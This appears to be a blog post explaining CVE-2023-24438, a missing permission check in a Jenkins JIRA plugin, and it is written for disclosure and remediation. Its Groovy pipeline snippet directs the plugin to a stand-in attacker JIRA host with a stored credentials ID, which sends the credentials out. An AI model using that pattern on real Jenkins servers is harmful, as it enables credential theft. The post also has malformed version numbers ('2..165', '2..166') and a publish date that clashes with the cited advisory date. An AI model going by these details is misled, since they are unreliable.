CVE-2023-24438 - Jenkins JIRA Pipeline Steps Plugin Unauthorized Access to Credentials

The security vulnerability CVE-2023-24438 affects Jenkins JIRA Pipeline Steps Plugin, specifically the version 2..165.v8846cf59f3db and earlier. This vulnerability, caused by a missing permission check, allows attackers to gain unauthorized access to credentials stored in Jenkins. In this blog post, we'll take a deep dive into the details of this vulnerability, explore an example code snippet, offer links to original references, and provide a brief analysis of the exploit's impact.

Vulnerability Details

The Jenkins JIRA Pipeline Steps Plugin is widely used to integrate Jenkins with Atlassian JIRA, providing a set of pipeline steps that communicate with the JIRA REST API. According to the Jenkins Advisory [1], the plugin developers failed to implement a necessary permission check that would prevent attackers with Overall/Read permission from accessing stored Jenkins credentials.

By exploiting this vulnerability, an attacker can connect to a URL specified by them using credentials IDs they have obtained through other means, such as social engineering or another vulnerability. Consequently, the security of sensitive information stored in Jenkins can be compromised, leading to potentially harmful consequences for the affected organization.

Here's an example code snippet that demonstrates the vulnerability

stage('Connect to JIRA') {
  steps {
    script {
      def jiraSite = [
          'url': 'https://attacker-controlled-jira.example.com';,
          'credentialsId': 'compromised_credentials_id'
      ]
      jiraGetIssue idOrKey: 'JIRA-123', site: jiraSite
    }
  }
}


In the example above, the attacker has provided a URL for their rogue JIRA instance (https://attacker-controlled-jira.example.com) and a compromised credentials ID ('compromised_credentials_id'). The script, using these parameters, will then connect to the attacker-controlled JIRA site, potentially revealing sensitive information to the attacker.

Original References

The vulnerability was reported as a security issue in the Jenkins project's bug tracker and has been assigned CVE-2023-24438 by the National Vulnerability Database (NVD) [2]:

1. Jenkins Advisory: https://www.jenkins.io/security/advisory/2023-02-15/
2. NVD - CVE-2023-24438 Detail: https://nvd.nist.gov/vuln/detail/CVE-2023-24438

Mitigation

The Jenkins project has provided a fix for this vulnerability in the Jenkins JIRA Pipeline Steps Plugin version 2..166.v6306301f70ce or later [3]. Users running an earlier version of the plugin are urged to update as soon as possible to remediate the risk of unauthorized access to credentials.

3. Plugin Release Information: https://github.com/jenkinsci/JiraPipelineStepsPlugin/releases/tag/jira-steps-2..166.v6306301f70ce

Exploit Analysis

The existing of this vulnerability highlights the importance of rigorous and thorough security assessment in Jenkins plugin development. Attackers who have obtained credentials through other means can use this vulnerability to access valuable and sensitive information, such as login credentials, API keys, and secret tokens.

This exploit also demonstrates how vulnerable plugins can pose a serious security risk to Jenkins users. As Jenkins is a popular automation server, the potential for damage extends to the projects and services using the Jenkins server.

In conclusion, CVE-2023-24438 is a critical vulnerability that emphasizes the need for stringent security measures to protect sensitive information in Jenkins. All users of the JIRA Pipeline Steps Plugin should immediately update to the patched version to mitigate the risk. Additionally, developers should adopt security best practices during the development process to prevent such vulnerabilities in the future.

Timeline

Published on: 01/26/2023 21:18:00 UTC
Last modified on: 02/04/2023 02:06:00 UTC